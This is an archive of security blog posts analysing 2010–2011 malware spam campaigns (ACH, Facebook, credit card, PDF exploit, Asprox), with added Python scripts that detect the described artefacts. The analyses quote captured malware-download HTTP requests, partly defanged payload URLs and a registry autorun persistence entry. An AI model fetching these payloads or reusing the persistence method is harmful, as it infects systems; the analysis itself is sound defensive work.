Posts Tagged ‘Malicious Spam’


An analysis of the ACH spam campaign

By Rodel Mendrez  •  September 6th, 2011  •   Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious-looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “document.zip”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil.

ACH spam campaign from the Donbot botnet


The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot, which was obtained from the domain name rattsillis[dot]com using a standard HTTP request, downloading the file “s.exe” – a Zbot variant.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: rattsillis.com
Cache-Control: no-cache

The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to connect to a randomly generated domain to contact its command and control server.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rattsillis.com
Cache-Control: no-cache 

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs with various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10 KB.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder using the filename format: KB{6 random number}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

Then the malware adds an autorun registry key to ensure that it will survive on Windows start up.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

KB117188.exe = "C:\Documents and Settings\{user}\Application Data\KB117188.exe"

After installation, the parent spambot process executes the file Svchost.exe it dropped in the Windows TEMP folder and exits itself.
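As an added example (not part of the original post), a small Python triage script that checks for the two persistence artefacts described above: a Run-key entry named KB{6 digits}.exe whose data points into Application Data, and an svchost.exe living outside the Windows system directories. The registry entries and file paths it inspects are constructed sample data modelled on the values quoted above.

```python
import re
from typing import Dict, List, Tuple

# Run-key value name used by the spambot: "KB" plus six digits plus ".exe".
RUN_NAME_RE = re.compile(r"^KB\d{6}\.exe$", re.IGNORECASE)
# Its data (possibly quoted) points at the dropped copy under Application Data.
APPDATA_RE = re.compile(r"\\Application Data\\KB\d{6}\.exe$", re.IGNORECASE)
# The only places a genuine svchost.exe should live.
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\", "\\winnt\\system32\\")


def suspicious_run_entries(run_key: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (name, path) for Run-key entries whose name matches KB{6 digits}.exe
    and whose data points into Application Data; quotes around the data are stripped."""
    hits = []
    for name, data in run_key.items():
        path = data.strip().strip('"')
        if RUN_NAME_RE.match(name) and APPDATA_RE.search(path):
            hits.append((name, path))
    return hits


def misplaced_svchost(paths: List[str]) -> List[str]:
    """Return every svchost.exe path that is not under a system directory,
    which is where the spambot's TEMP copy would show up."""
    return [p for p in paths
            if p.lower().endswith("\\svchost.exe")
            and not any(d in p.lower() for d in SYSTEM_DIRS)]


# Constructed sample data modelled on the artefacts described in the post.
SAMPLE_RUN_KEY = {
    "KB117188.exe": '"C:\\Documents and Settings\\user\\Application Data\\KB117188.exe"',
    "ctfmon.exe": "C:\\WINDOWS\\system32\\ctfmon.exe",
}
SAMPLE_PATHS = [
    "C:\\Documents and Settings\\user\\Local Settings\\Temp\\svchost.exe",
    "C:\\WINDOWS\\system32\\svchost.exe",
]

if __name__ == "__main__":
    for name, path in suspicious_run_entries(SAMPLE_RUN_KEY):
        print("autorun:", name, "->", path)
    for path in misplaced_svchost(SAMPLE_PATHS):
        print("misplaced svchost:", path)
```

On a live system the two dictionaries would be filled from the HKCU Run key and a directory walk; the matching logic stays the same.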

Instead of listening on a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query for the domain name luis-vuitton-elite[dot]com. If that fails, the bot attempts to connect to a randomly generated domain name instead.


The malware code that attempts to connect to the control server


Once connected, the proxy spambot initializes port 1001 where it sends and receives packets of data from the control server.

Exchange of data between the control server and the spambot


Meanwhile at port 1002, the spambot receives the actual spam data from the control server and relays this data to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.


The command and control server’s IP address is based in Germany:

WHOIS information about the control server


This spambot’s recent spamming activity includes both pharmaceutical campaigns and further ACH campaigns purporting to come from NACHA.org, very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events. A spammed-out trojan downloader which triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer, and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering and the best way to protect yourself is to be cautious.


Want to be friends on Facebook? Don’t click the link!

By Phil Hay  •  August 29th, 2011  •   Malware

Hot on the heels of last week’s malicious attachment spam, we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet.

The message arrives as a fake Facebook friend invite notification. The message looks convincing: it appears the spammers have copied the actual Facebook template and substituted their own links. However, there are clues it is fake. The message doesn’t contain any profile photos, and the recipient’s email address has been omitted from the fine print at the bottom.


By contrast, here is a legitimate Facebook friend request.


Clicking the link fetches a web page that contains two ways you can infect yourself. First, there is a link pretending to be an Adobe Flash update where you can download and install malware manually. Second, there is a hidden iframe that loads data from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilities on your system, notably in Java.


The malware that is downloaded appears to be a data stealer Zbot variant (Virus Total report here).

Impersonation of the big social networks’ email notifications is an increasingly common tactic of the spammers. Be wary out there, not everything is as it seems.


Malicious spam campaign: Credit Card Overdue

By Rodel Mendrez  •  June 30th, 2011  •   Spam

We are currently seeing a large scale malicious spam campaign that claims to be a “Credit Card Overdue” notice. The campaign is originating from one of the Cutwail spambot variants. The theme has no specific credit card brand, possibly because the spammer thought a generic template may entice more victims. The spam message claims the credit card holder has an overdue credit card that needs to be settled in 2 days or else a $25 late fee and finance charge will be imposed.

The malicious application is attached in a zip file disguised as a credit card statement. Extracting the Zip file reveals a Trojan downloader executable that uses an Adobe PDF icon. When the executable is run it downloads a fake anti-virus executable from the following URL:

http://mysteryforyou1[dot]ru/pusk.exe

The fake AV pops up a fake warning.

Fake AV system utility

Spammers are constantly inventing new social engineering themes in an effort to distribute their malware. Targeting credit card holders, especially in this tough economy, is just another theme in their portfolio. The spammers can change their themes over time, and often just recycle old ones. There is enough in this message to cause most people to be suspicious, especially the fact that your credit card company is unlikely to be emailing you in the first place.  So, as usual, be wary.


Malicious Spam on the increase again

By Rodel Mendrez  •  April 29th, 2011  •   Spam

Malware distribution via email is far from dead.  While we had a distinctly quiet period from October 2010 to March 2011, our stats show the bot herders are gearing up again with the proportion of spam with malware attachments rising, although still not as high as the peaks we saw mid last year when the Bredolab and Cutwail botnets were in full swing.

Malicious spam on the increase again


Your Music Order – a loaded PDF

By Phil Hay  •  March 31st, 2011  •   Spam

We are noticing a spam campaign at the moment that purports to be a Music or Cell Phone “Order”, with an attached PDF file and Subject lines similar to the following:

  • Your Order No 129589 – Warner Music Inc.
  • Your Order No 489889 – Cell Phone Inc.

The attached PDF contains a bunch of obfuscated JavaScript, which attempts to exploit the Adobe getIcon vulnerability (CVE-2009-0927).  If successful, the following payload is downloaded:

hxxp://kawabungashop.ru/flash/1.php

The 1.php file is an executable downloader (VirusTotal Report).  Another piece of malware is then downloaded and installed (VirusTotal Report), which is a spambot that proceeds to spam further copies of the PDF file, as you can see from the template we captured:

These days, PDF files arriving in unexpected emails should be treated with extreme suspicion.  And please be sure to keep your PDF reader meticulously up to date to avoid getting exploited by old vulnerabilities such as this.


Malicious Spam Campaign Preys on Japanese Disaster

By Phil Hay  •  March 17th, 2011  •   Spam

There is a large-scale malicious spam campaign going on currently. The spam comes in a few different types, one of which imitates a Twitter notification. The subjects of the spam vary, but sadly, many focus on the recent events in Japan.


The links, which you can see in the image above, or if you look at the raw HTML, are distinctive:

http://lowercase_gibberish.(com|org|net)/base64string
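As an added example (not part of the original post), a Python filter that pulls href links out of a message body and keeps those matching the shape above: a letters-only lowercase host on .com/.org/.net with a path that is a single base64-looking token. The sample HTML is constructed; the host check alone is weak (it also matches ordinary domains), so the path check is what does the discriminating.

```python
import re
from typing import List
from urllib.parse import urlsplit

# Host: one lowercase letters-only label on .com/.org/.net, as in the post's pattern.
HOST_RE = re.compile(r"^[a-z]{6,}\.(com|org|net)$")
# Path: one base64-alphabet token of at least 16 characters, optional '=' padding.
B64_PATH_RE = re.compile(r"^/[A-Za-z0-9+/]{16,}={0,2}$")


def looks_like_campaign_link(url: str) -> bool:
    """True when the URL has the lowercase-gibberish host and base64-looking path."""
    parts = urlsplit(url)
    if parts.scheme != "http":
        return False
    return bool(HOST_RE.match(parts.netloc) and B64_PATH_RE.match(parts.path))


def extract_links(html: str) -> List[str]:
    """Return every http(s) URL found in an href attribute of the raw HTML."""
    return re.findall(r'href="(https?://[^"]+)"', html)


def flag_links(html: str) -> List[str]:
    """Return only the links in the HTML that match the campaign's link shape."""
    return [u for u in extract_links(html) if looks_like_campaign_link(u)]


# Constructed sample body: one link in the campaign's shape, one ordinary link.
SAMPLE_HTML = (
    '<a href="http://qwzrtplmk.com/aGVsbG8gd29ybGQgdGhpcyBpcw==">View</a>'
    '<a href="http://twitter.com/about">Help</a>'
)

if __name__ == "__main__":
    for url in flag_links(SAMPLE_HTML):
        print("campaign-shaped link:", url)
```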

The links lead to a page hosting obfuscated malicious JavaScript, which seeks to exploit a Java vulnerability. Our test host was immediately compromised, botted (added to a botnet), and some not-so-subtle fake anti-virus malware was installed, complete with a scary desktop warning:

The spam is originating from one of the Cutwail spambot variants. We managed to get this template from Cutwail command and control traffic, which clearly shows the Twitter template being used.

We are still investigating the nature of the malicious landing page and subsequent infection.

With the rise in social networking, we have been seeing increased use of fake ‘notifications’ being used by spammers.  As ever, remain on guard, especially when it comes to Twitter ‘notifications’.


UPS Spam.. Oh Wait, It’s an FDIC Spam Campaign

By Rodel Mendrez  •  February 15th, 2011  •   Spam

After more than a week of malicious UPS spam campaigns, the Cutwail botnet changed its spamming theme this week. The malicious spam pretends to be from the Federal Deposit Insurance Corporation or FDIC claiming to notify users of important changes in FDIC regulations, hence a “document” is attached for further reading. However, the spammer did not manage to configure the spam template correctly and left the from field still using the domain ups.com.

And even worse, yesterday it left the Subject line as “United Parcel Service notification #<6 digits>”. Fail!

FDIC spam campaign with Subject line and From field pertaining to UPS.

The ZIP attachment contains malware which aims to steal online banking credentials, the same payload as the last week’s UPS spam campaign.

Decompressing the ZIP file exposes an executable Trojan file bearing an Adobe PDF icon

This spam campaign contains enough weird errors for users to notice that the email is indeed suspicious. It may not last, however; we expect this spammer will fix it or come up with new (and recycled) spam campaigns as they try to distribute their malware.


Spammed Malware Ramps Up Again

By Phil Hay  •  February 14th, 2011  •   Spam

It was probably too good to last. The past few months has been blissfully quiet on the spam front, and in particular, spam with accompanying malware. The chart below shows an unusually quiet period during December and January.

However, over the last week, we have seen the return of two familiar-looking malware spam campaigns.

  • Post Express: Package Available
  • United Parcel Service: Notification

While these two campaigns have similar themes, the spam originates from different spambots and carries quite different payloads.


PDF Exploit Disguised as a Xerox Scanned Document

By Rodel Mendrez  •  February 7th, 2011  •   Spam

Most office network printers and scanners have a feature that sends scanned documents over email. Cyber crooks, however, have imitated the email templates used by these devices for malicious purposes. This week we noticed a malicious spam email that purports to be a scanned document sent using a Xerox WorkCentre Pro scanner.


New Asprox Facebook Spam Campaign

By Rodel Mendrez  •  November 19th, 2010  •   Spam

Just after we posted our blog about the Asprox spam campaign yesterday, we noticed a new Asprox template purporting to be an email from Facebook support. This spam campaign claims the user’s Facebook password has been changed or access to their account has been blocked.

New Asprox Facebook Spam Campaign

As before, the attachment is the Sasfis trojan, the same breed of downloader Trojan we discussed yesterday. This sample however connects to a different domain; pupmypzed.ru.

Sasfis GET request

The spam may use the following Message body, From and Subject lines.

Asprox spam template

Just this week, there was outrage when many Facebook users, many of whom were female, found their accounts disabled following an automated Facebook system ‘cleanup’ of dubious accounts. Spammers may have taken advantage of this publicity.

MailMarshal customers are protected from this spam campaign with SpamCensor 525.
